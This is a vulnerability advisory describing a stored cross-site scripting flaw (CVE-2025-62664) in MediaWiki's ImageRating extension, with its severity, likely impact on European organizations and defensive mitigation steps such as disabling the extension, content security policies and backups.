CVE-2025-62664 is a stored Cross-site Scripting (XSS) vulnerability classified under CWE-79, found in the ImageRating extension of the Mediawiki platform maintained by The Wikimedia Foundation. This vulnerability occurs due to improper neutralization of user-supplied input during the generation of web pages, allowing malicious scripts to be stored and later executed in the context of users visiting the affected pages. The flaw affects the master branch of the ImageRating extension prior to version 1.39. The vulnerability does not require any authentication or user interaction to be exploited, increasing its risk profile. The CVSS 4.0 vector indicates network attack vector (AV:N), low attack complexity (AC:L), no privileges required (PR:N), no user interaction (UI:N), and low to limited impacts on confidentiality, integrity, and availability (VC:L, VI:L, VA:L). This means an attacker can remotely inject malicious JavaScript code that executes in the browsers of users accessing the vulnerable Mediawiki pages, potentially leading to session hijacking, defacement, or redirection to malicious sites. Although no public exploits have been reported yet, the presence of stored XSS in a widely used wiki platform extension poses a significant risk, especially for public or collaborative environments where user-generated content is common. The vulnerability was published on October 18, 2025, and no patches or fixes were linked at the time of reporting, indicating the need for vigilance and proactive mitigation by administrators.

For European organizations, the impact of CVE-2025-62664 can be substantial, particularly for those relying on Mediawiki for internal knowledge bases, documentation, or public-facing collaborative platforms. Exploitation could lead to the execution of arbitrary scripts in users' browsers, enabling attackers to steal session cookies, perform actions on behalf of users, deface content, or distribute malware. This compromises confidentiality and integrity of information and can disrupt availability if attackers manipulate or delete content. Public sector entities, educational institutions, and enterprises with open wiki environments are at higher risk due to the collaborative nature of Mediawiki. The vulnerability's ease of exploitation without authentication or user interaction increases the likelihood of automated attacks or mass exploitation campaigns. Additionally, reputational damage and potential regulatory consequences under GDPR may arise if user data is compromised through such attacks.

European organizations should take immediate steps to mitigate this vulnerability. First, monitor official Wikimedia Foundation channels for patches or updates to the ImageRating extension and apply them promptly once available. Until patches are released, administrators should consider disabling or removing the ImageRating extension if feasible. Implement strict input validation and sanitization on all user-supplied content to prevent injection of malicious scripts. Deploy Content Security Policies (CSP) that restrict the execution of inline scripts and limit sources of executable code to trusted domains. Regularly audit Mediawiki installations for unauthorized content or suspicious scripts. Educate users and administrators about the risks of XSS and encourage reporting of anomalous behavior. Employ web application firewalls (WAFs) with rules targeting XSS patterns to provide an additional layer of defense. Finally, maintain up-to-date backups of wiki content to enable recovery in case of defacement or data loss.